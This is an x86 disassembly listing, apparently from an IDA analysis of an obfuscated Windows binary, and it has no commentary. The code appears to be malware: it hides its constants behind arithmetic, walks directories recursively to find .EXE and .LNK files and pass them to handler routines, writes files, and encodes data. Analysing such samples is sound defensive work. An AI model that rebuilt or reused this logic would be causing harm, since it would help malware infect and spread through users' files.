cmp edi, esi
jb short loc_41C0A9
or ebx, ebx
jz short loc_41C122
movsx eax, word ptr ds:1001213Ch
movsx edx, word ptr ds:10012108h
add eax, edx
sub eax, 0Bh
mov edx, esi
sub edx, eax
mov eax, ds:10012110h
add eax, ds:10012098h
sub eax, 0Dh
mov [ebp+edx+var_30D40], al
loc_41C122: ; CODE XREF: sub_41BEF1+203�j
movsx eax, word ptr ds:10012114h
mov edx, ds:10012148h
sub edx, 2
mov [ebp+eax+var_30DBF], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_41B6EC
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_420BEA
add esp, 18h
mov [ebp+var_30E44], eax
mov eax, ds:10012098h
sub eax, 5
cmp [ebp+var_30E44], eax
jnz loc_41C365
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_41C2C5
movsx eax, word ptr ds:100120CCh
cmp [ebp+eax+var_30D47], 64h
jnz loc_41C22D
movzx eax, [ebp+var_30D3F]
movsx edx, word ptr ds:1001213Ch
mov ecx, ds:10012110h
lea edx, [edx+ecx+11h]
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_42221E
movsx eax, word ptr ds:10012118h
sub eax, 9
mov ds:1000E61Ch, eax
movsx eax, word ptr ds:100120CCh
movsx edx, word ptr ds:100120B4h
add eax, edx
sub eax, 0Ch
mov ds:10012210h, eax
movsx eax, word ptr ds:100120B8h
mov edx, ds:100120D0h
mov [ebp+eax+var_30D40], dl
movsx eax, word ptr ds:100120F0h
sub eax, 4
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_4241CE
add esp, 10h
loc_41C22D: ; CODE XREF: sub_41BEF1+2B2�j
mov eax, ds:100120A8h
movsx edx, word ptr ds:100120B8h
add eax, edx
cmp [ebp+eax+var_30D46], 67h
jnz loc_41C365
mov eax, ds:100120BCh
add eax, 6
add eax, ds:1001209Ch
mov edx, ds:100120ECh
mov [ebp+eax+var_30D40], dl
lea eax, [ebp+var_30D3F]
push eax
call dword ptr ds:1000C054h
mov [ebp+var_61D9C], eax
push eax
push 10011670h
call sub_422550
mov eax, ds:10012148h
add eax, ds:100120FCh
sub eax, 5
mov ds:1000E61Ch, eax
movsx eax, word ptr ds:100120F0h
add eax, ds:10012138h
sub eax, 7
mov ds:10012210h, eax
mov eax, ds:100120ACh
dec eax
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_4241CE
add esp, 14h
jmp loc_41C365
; ---------------------------------------------------------------------------
loc_41C2C5: ; CODE XREF: sub_41BEF1+29D�j
mov eax, ds:10012104h
add eax, 5
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_424172
push 10013746h
call sub_41E33D
push eax
lea edx, [ebp+var_30F4B]
push edx
call dword ptr ds:1000C020h
push 0
push 80h
push 2
push 0
movsx eax, word ptr ds:100120F4h
push eax
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:10011788h
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call dword ptr ds:10011B8Ch
push [ebp+var_61C98]
call dword ptr ds:10010650h
push 5
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:1000E0E0h
movzx eax, [ebp+var_30F51]
push eax
call sub_41E420
add esp, 18h
loc_41C365: ; CODE XREF: sub_41BEF1+8E�j
; sub_41BEF1:loc_41BFBB�j ...
push [ebp+var_30E48]
call dword ptr ds:10010650h
cmp [ebp+var_30F50], 0
jz short loc_41C383
push [ebp+arg_0]
call dword ptr ds:1000C008h
loc_41C383: ; CODE XREF: sub_41BEF1+4B�j
; sub_41BEF1+487�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BEF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C388 proc near ; CODE XREF: sub_41C388+2BC�p
; sub_41C388+320�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_41C3AD
mov eax, ds:100120ECh
mov [ebp+var_248], eax
jmp loc_41C43F
; ---------------------------------------------------------------------------
loc_41C3AD: ; CODE XREF: sub_41C388+13�j
mov edx, [ebp+arg_4]
mov ecx, ds:1001209Ch
movsx eax, word ptr ds:100120A0h
add ecx, eax
sub ecx, 8
cmp ds:1000E630h[edx*4], ecx
jnz short loc_41C3E7
push ebx
call dword ptr ds:1000E608h
mov eax, ds:100120D0h
add eax, ds:100120B0h
sub eax, 4
push eax
call dword ptr ds:10011660h
loc_41C3E7: ; CODE XREF: sub_41C388+41�j
mov eax, ds:10012138h
add eax, 62h
mov [ebp+var_248], eax
push 1001373Eh
call sub_41E33D
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call dword ptr ds:10011634h
add esp, 10h
lea eax, [ebp+var_252]
push eax
call dword ptr ds:10011664h
cmp eax, 3
jnz short loc_41C43F
movsx eax, word ptr ds:10012114h
mov edx, ds:100120C4h
lea eax, [eax+edx+125h]
mov [ebp+var_248], eax
loc_41C43F: ; CODE XREF: sub_41C388+20�j
; sub_41C388+9B�j
xor edi, edi
inc edi
push 10013737h
call sub_41E33D
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10011634h
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41C463: ; CODE XREF: sub_41C388+E0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C463
mov edx, eax
movsx ecx, word ptr ds:10012114h
movsx eax, word ptr ds:100120CCh
add ecx, eax
sub ecx, 5
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_41C51B
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41C490: ; CODE XREF: sub_41C388+10D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C490
movsx ecx, word ptr ds:10012090h
add ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 4Ch
jnz short loc_41C51B
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41C4BD: ; CODE XREF: sub_41C388+13A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C4BD
movsx ecx, word ptr ds:100120B4h
sub ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 4Eh
jnz short loc_41C51B
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41C4EA: ; CODE XREF: sub_41C388+167�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C4EA
movsx ecx, word ptr ds:100120F0h
sub ecx, 3
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 4Bh
jnz short loc_41C51B
push esi
call sub_420923
add esp, 4
loc_41C51B: ; CODE XREF: sub_41C388+FD�j
; sub_41C388+12E�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41C520: ; CODE XREF: sub_41C388+19D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C520
mov edx, eax
movsx ecx, word ptr ds:1001211Ch
mov eax, ds:10012148h
lea ecx, [ecx+eax+1]
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_41C5EA
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41C54A: ; CODE XREF: sub_41C388+1C7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C54A
movsx ecx, word ptr ds:100120F4h
add ecx, 4
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 45h
jnz short loc_41C5EA
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41C577: ; CODE XREF: sub_41C388+1F4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C577
mov edx, eax
movsx ecx, word ptr ds:100120E4h
movsx eax, word ptr ds:100120B4h
add ecx, eax
sub ecx, 8
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 58h
jnz short loc_41C5EA
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41C5AD: ; CODE XREF: sub_41C388+22A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C5AD
movsx ecx, word ptr ds:100120A0h
add ecx, ds:10012098h
sub ecx, 8
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 45h
jnz short loc_41C5EA
push [ebp+var_248]
push esi
call sub_41BB32
add esp, 8
loc_41C5EA: ; CODE XREF: sub_41C388+1B7�j
; sub_41C388+1E8�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:1000F258h
mov ebx, eax
mov eax, ds:10012128h
inc eax
neg eax
cmp ebx, eax
jz loc_41C6B4
cmp [ebp+var_112], 2Eh
jz loc_41C6B0
lea eax, [ebp+var_112]
push eax
push esi
push 10013731h
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10011634h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_41C388
add esp, 1Ch
jmp short loc_41C6B0
; ---------------------------------------------------------------------------
loc_41C64E: ; CODE XREF: sub_41C388+32A�j
lea eax, [ebp+var_13E]
push eax
push ebx
call dword ptr ds:1000D004h
mov edi, eax
or edi, edi
jnz short loc_41C678
push [ebp+var_248]
call dword ptr ds:10011630h
pop ecx
push ebx
call dword ptr ds:1000E608h
jmp short loc_41C6B4
; ---------------------------------------------------------------------------
loc_41C678: ; CODE XREF: sub_41C388+2D8�j
cmp [ebp+var_112], 2Eh
jz short loc_41C6B0
lea eax, [ebp+var_112]
push eax
push esi
push 10013731h
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10011634h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_41C388
add esp, 1Ch
loc_41C6B0: ; CODE XREF: sub_41C388+28F�j
; sub_41C388+2C4�j ...
or edi, edi
jnz short loc_41C64E
loc_41C6B4: ; CODE XREF: sub_41C388+282�j
; sub_41C388+2EE�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C388 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41C6BC: ; CODE XREF: .data:0041C6EC�j
call sub_41CE86
mov eax, ds:10012098h
add eax, ds:10012110h
sub eax, 0Bh
mov edx, ds:100120C0h
add edx, 0EA5Ah
add edx, ds:100120D8h
imul eax, edx
push eax
call dword ptr ds:10011630h
pop ecx
jmp short loc_41C6BC
; ---------------------------------------------------------------------------
dw 0C25Dh
db 4, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C6F2 proc near ; CODE XREF: sub_41A8E7+2�p
; sub_41A8E7+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
movsx eax, word ptr ds:10012090h
movsx edx, word ptr ds:10012118h
add eax, edx
sub eax, 0Bh
push eax
push 0
push [ebp+arg_0]
push 0
call dword ptr ds:1000EA44h
mov edi, eax
or edi, edi
jnz short loc_41C755
push 1001372Ch
call sub_41E33D
push eax
lea edi, [ebp+var_104]
push edi
call dword ptr ds:1000C020h
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_41C388
add esp, 18h
loc_41C755: ; CODE XREF: sub_41C6F2+36�j
pop edi
leave
retn
sub_41C6F2 endp
; ---------------------------------------------------------------------------
dd 4001B8h, 8C280h, 4001B8h, 10C280h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C768 proc near ; CODE XREF: .data:004211C9�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_41C7CD
xor eax, eax
jmp loc_41C888
; ---------------------------------------------------------------------------
loc_41C7A0: ; CODE XREF: sub_41C768+71�j
push esi
push [ebp+arg_0]
call sub_41E290
add esp, 8
sub ebx, ds:1001210Ch
movsx eax, word ptr ds:10012118h
sub eax, 6
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
mov eax, ds:100120ACh
add eax, 2
lea esi, [esi+eax]
loc_41C7CD: ; CODE XREF: sub_41C768+2F�j
movsx eax, word ptr ds:1001213Ch
sub eax, 4
cmp ebx, eax
jnb short loc_41C7A0
mov eax, ds:10012144h
add eax, ds:10012138h
sub eax, 2
cmp ebx, eax
jbe short loc_41C85E
push 3
mov eax, ds:1001210Ch
add eax, ds:10012104h
sub eax, 5
push eax
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10010640h
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10010634h
push esi
lea eax, [ebp+var_7]
push eax
call sub_41E290
add esp, 20h
movsx eax, word ptr ds:10012114h
mov byte ptr [esi+eax], 3Dh
mov eax, ds:100120A8h
sub eax, 3
cmp ebx, eax
jnz short loc_41C851
movsx eax, word ptr ds:1001214Ch
movsx edx, word ptr ds:100120E4h
add eax, edx
sub eax, 8
mov byte ptr [esi+eax], 3Dh
loc_41C851: ; CODE XREF: sub_41C768+D0�j
movsx eax, word ptr ds:10012118h
sub eax, 5
lea esi, [esi+eax]
loc_41C85E: ; CODE XREF: sub_41C768+83�j
mov eax, ds:10012094h
movsx edx, word ptr ds:100120F0h
add eax, edx
sub eax, 5
movsx edx, word ptr ds:1001214Ch
movsx ecx, word ptr ds:100120F4h
add edx, ecx
sub edx, 4
mov [esi+eax], dl
xor eax, eax
inc eax
loc_41C888: ; CODE XREF: sub_41C768+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C768 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C88D proc near ; CODE XREF: sub_4206FE+C6�p
; sub_4206FE+11D�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41C8A3: ; CODE XREF: sub_41C88D+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C8A3
mov [ebp+var_4], eax
movsx edi, word ptr ds:10012130h
sub edi, 4
jmp short loc_41C923
; ---------------------------------------------------------------------------
loc_41C8B9: ; CODE XREF: sub_41C88D+99�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_41C8CC
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_41C8CC
cmp al, 2Eh
jnz short loc_41C8E5
loc_41C8CC: ; CODE XREF: sub_41C88D+32�j
; sub_41C88D+39�j
movzx eax, byte ptr [esi+edi]
push eax
push 10013729h
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10011634h
add esp, 0Ch
jmp short loc_41C914
; ---------------------------------------------------------------------------
loc_41C8E5: ; CODE XREF: sub_41C88D+3D�j
push 10013724h
call sub_41E33D
push eax
push ebx
call dword ptr ds:1000C020h
push 1001371Ch
call sub_41E33D
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call dword ptr ds:10011634h
add esp, 1Ch
loc_41C914: ; CODE XREF: sub_41C88D+56�j
lea eax, [ebp+var_7]
push eax
push ebx
call dword ptr ds:1000C020h
add esp, 8
inc edi
loc_41C923: ; CODE XREF: sub_41C88D+2A�j
cmp edi, [ebp+var_4]
jb short loc_41C8B9
pop edi
pop esi
pop ebx
leave
retn
sub_41C88D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C92D proc near ; CODE XREF: .data:0041CDB4�p
var_1008 = byte ptr -1008h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_42507D
push ebx
push esi
push edi
push 1001370Ah
call sub_41E33D
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call dword ptr ds:10011638h
mov edi, eax
or edi, edi
jnz short loc_41C95F
mov edi, [ebp+arg_0]
loc_41C95F: ; CODE XREF: sub_41C92D+2D�j
push 100136F4h
call sub_41E33D
pop ecx
push 0
push eax
push 0
push edi
call dword ptr ds:10011638h
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call dword ptr ds:1000C014h
mov eax, ds:100120ECh
cmp [ebp+eax+var_FFF], 20h
jnz short loc_41C9AF
mov eax, ds:100120BCh
cmp [ebp+eax+var_FFF], 20h
jz loc_41CA67
loc_41C9AF: ; CODE XREF: sub_41C92D+6D�j
mov eax, ds:100120C4h
movsx edx, word ptr ds:100120B4h
add eax, edx
cmp [ebp+eax+var_1008], 68h
jnz short loc_41C9E3
mov eax, ds:100120C0h
movsx edx, word ptr ds:10012140h
add eax, edx
cmp [ebp+eax+var_1008], 74h
jz loc_41CA67
loc_41C9E3: ; CODE XREF: sub_41C92D+98�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_41C9EC: ; CODE XREF: sub_41C92D+C4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C9EC
mov ebx, ds:10012100h
add ebx, 0Ah
cmp eax, ebx
jb short loc_41CA67
push 100136EFh
call sub_41E33D
movsx esi, word ptr ds:100120E4h
movsx ebx, word ptr ds:100120A0h
add esi, ebx
sub esi, 7
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_41FCE7
add esp, 10h
mov ebx, ds:100120BCh
add ebx, 0FFFEh
cmp eax, ebx
jnz short loc_41CA67
push 100136E9h
call sub_41E33D
pop ecx
push eax
movsx esi, word ptr ds:10012140h
movsx ebx, word ptr ds:10012108h
add esi, ebx
sub esi, 0Ch
push esi
push 0Ch
push edi
call dword ptr ds:1000C014h
loc_41CA67: ; CODE XREF: sub_41C92D+7C�j
; sub_41C92D+B0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41C92D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA6C proc near ; CODE XREF: sub_41A910+DE�p
; sub_41A910+541�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call dword ptr ds:1000C000h
mov edi, eax
push 0
push 0
mov eax, ds:10012110h
add eax, 1FF4h
add eax, ds:100120C0h
push eax
push esi
push edi
push ebx
mov eax, ds:100120D4h
movsx edx, word ptr ds:10012108h
add eax, edx
sub eax, 5
push eax
push 0
call dword ptr ds:1000C00Ch
movsx eax, word ptr ds:10012118h
sub eax, 9
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41CA6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAC7 proc near ; CODE XREF: .data:0041F980�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, ds:100120D0h
mov [ebp+var_4], eax
jmp short loc_41CAF0
; ---------------------------------------------------------------------------
loc_41CADA: ; CODE XREF: sub_41CAC7+34�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and dword ptr ds:1000F370h[eax], 0
inc [ebp+var_4]
loc_41CAF0: ; CODE XREF: sub_41CAC7+11�j
mov eax, ds:100120C4h
add eax, 60h
cmp [ebp+var_4], eax
jb short loc_41CADA
push 0
call dword ptr ds:1000E0D0h
push 10012254h
push 100138E0h
push 7
push 0
push 10013820h
call dword ptr ds:1000E620h
mov ebx, eax
mov eax, ds:10012134h
movsx edx, word ptr ds:10012120h
add eax, edx
sub eax, 0Ch
cmp ebx, eax
jnz loc_41CCEB
lea eax, [ebp+var_C]
push eax
mov eax, ds:10012254h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
movsx eax, word ptr ds:10012120h
sub eax, 8
cmp ebx, eax
jnz short loc_41CB65
mov eax, ds:10012098h
sub eax, 5
cmp [ebp+var_C], eax
jnz short loc_41CB6A
loc_41CB65: ; CODE XREF: sub_41CAC7+8F�j
jmp loc_41CC80
; ---------------------------------------------------------------------------
loc_41CB6A: ; CODE XREF: sub_41CAC7+9C�j
mov eax, ds:10012134h
add eax, ds:10012094h
sub eax, 4
mov [ebp+var_8], eax
jmp loc_41CC74
; ---------------------------------------------------------------------------
loc_41CB80: ; CODE XREF: sub_41CAC7+1B3�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:10012254h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:100120E8h
movsx edx, word ptr ds:1001213Ch
add eax, edx
sub eax, 0Dh
cmp ebx, eax
jnz loc_41CC71
lea eax, [ebp+var_40]
push eax
push 10013900h
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:100120A4h
movsx edx, word ptr ds:10012114h
add eax, edx
sub eax, 8
cmp ebx, eax
jnz short loc_41CC68
lea eax, ds:10012250h
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push 10013840h
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:1001212Ch
movsx edx, word ptr ds:1001213Ch
add eax, edx
sub eax, 0Bh
cmp ebx, eax
jnz short loc_41CC56
lea eax, [ebp+var_48]
push eax
push 10013840h
push [ebp+var_44]
push [ebp+var_40]
call sub_41CDDB
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41CC56: ; CODE XREF: sub_41CAC7+16A�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41CC68: ; CODE XREF: sub_41CAC7+12C�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41CC71: ; CODE XREF: sub_41CAC7+F9�j
inc [ebp+var_8]
loc_41CC74: ; CODE XREF: sub_41CAC7+B4�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_41CB80
loc_41CC80: ; CODE XREF: sub_41CAC7:loc_41CB65�j
lea eax, ds:10012274h
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push 10013830h
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push 10013830h
push [ebp+var_14]
push dword ptr ds:10012254h
call sub_41CDDB
add esp, 10h
mov [ebp+var_18], eax
movsx ecx, word ptr ds:10012140h
sub ecx, 7
cmp eax, ecx
jnz short loc_41CCEB
mov eax, ds:10012254h
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword ptr ds:10012254h, 0
loc_41CCEB: ; CODE XREF: sub_41CAC7+6C�j
; sub_41CAC7+210�j
pop edi
pop esi
pop ebx
leave
retn
sub_41CAC7 endp
; =============== S U B R O U T I N E =======================================
sub_41CCF0 proc near ; CODE XREF: .data:0041F75A�p
push edi
push 100136DBh
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:10012170h, eax
test eax, eax
jnz short loc_41CD23
push 100136CDh
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:10012170h, eax
loc_41CD23: ; CODE XREF: sub_41CCF0+1A�j
cmp dword ptr ds:10012170h, 0
jz short loc_41CD4C
mov eax, ds:10012128h
movsx edx, word ptr ds:10012108h
add eax, edx
push eax
push dword ptr ds:10012170h
call dword ptr ds:1000E1F8h
mov ds:1000C01Ch, eax
loc_41CD4C: ; CODE XREF: sub_41CCF0+3A�j
pop edi
retn
sub_41CCF0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2000h
call sub_42507D
push ebx
push esi
push edi
push 1FFFh
lea eax, [ebp-1FFFh]
push eax
push dword ptr [ebp+8]
call dword ptr ds:10011BA4h
push 100136B8h
call sub_41E33D
movsx edi, word ptr ds:100120A0h
sub edi, 4
push edi
push eax
lea edi, [ebp-1FFFh]
push edi
call sub_41FCE7
add esp, 10h
mov esi, ds:100120E8h
add esi, 0FFF4h
movsx ebx, word ptr ds:10012108h
add esi, ebx
cmp eax, esi
jz short loc_41CDBA
push dword ptr [ebp+8]
call sub_41C92D
pop ecx
loc_41CDBA: ; CODE XREF: .data:0041CDAF�j
xor eax, eax
inc eax
pop edi
pop esi
pop ebx
leave
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 1000E604h
call dword ptr ds:1000EA3Ch
mov eax, ds:1000E604h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CDDB proc near ; CODE XREF: sub_41CAC7+17B�p
; sub_41CAC7+1F9�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov eax, ds:100120D4h
mov esi, eax
add esi, ds:10012128h
lea eax, [ebp+var_4]
push eax
push 10013860h
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, ds:10012124h
add eax, ds:100120D4h
sub eax, 2
cmp edi, eax
jz short loc_41CE1E
xor eax, eax
jmp short loc_41CE81
; ---------------------------------------------------------------------------
loc_41CE1E: ; CODE XREF: sub_41CDDB+3D�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
mov eax, ds:10012138h
movsx edx, word ptr ds:10012114h
add eax, edx
sub eax, 5
cmp edi, eax
jnz short loc_41CE76
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
movsx eax, word ptr ds:100120F0h
sub eax, 5
cmp edi, eax
jnz short loc_41CE6D
mov esi, ds:100120DCh
sub esi, 7
loc_41CE6D: ; CODE XREF: sub_41CDDB+87�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_41CE76: ; CODE XREF: sub_41CDDB+68�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_41CE81: ; CODE XREF: sub_41CDDB+41�j
pop edi
pop esi
pop ebx
leave
retn
sub_41CDDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE86 proc near ; CODE XREF: .data:loc_41C6BC�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, ds:100120A8h
sub eax, 4
push eax
push 0
push 20h
push 0
call dword ptr ds:1000EA44h
lea eax, [ebp+var_10]
push eax
call dword ptr ds:1000F25Ch
movsx eax, word ptr ds:10012090h
mov edx, ds:10012098h
movzx ecx, [ebp+var_6]
movzx ebx, [ebp+var_8]
mov esi, ds:100120A8h
add esi, 38h
imul ebx, esi
add ecx, ebx
movzx ebx, [ebp+var_A]
mov esi, ds:10012144h
add esi, 18h
imul ebx, esi
movsx esi, word ptr ds:100120A0h
lea esi, [esi+eax+35h]
imul ebx, esi
add ecx, ebx
movzx ebx, [ebp+var_E]
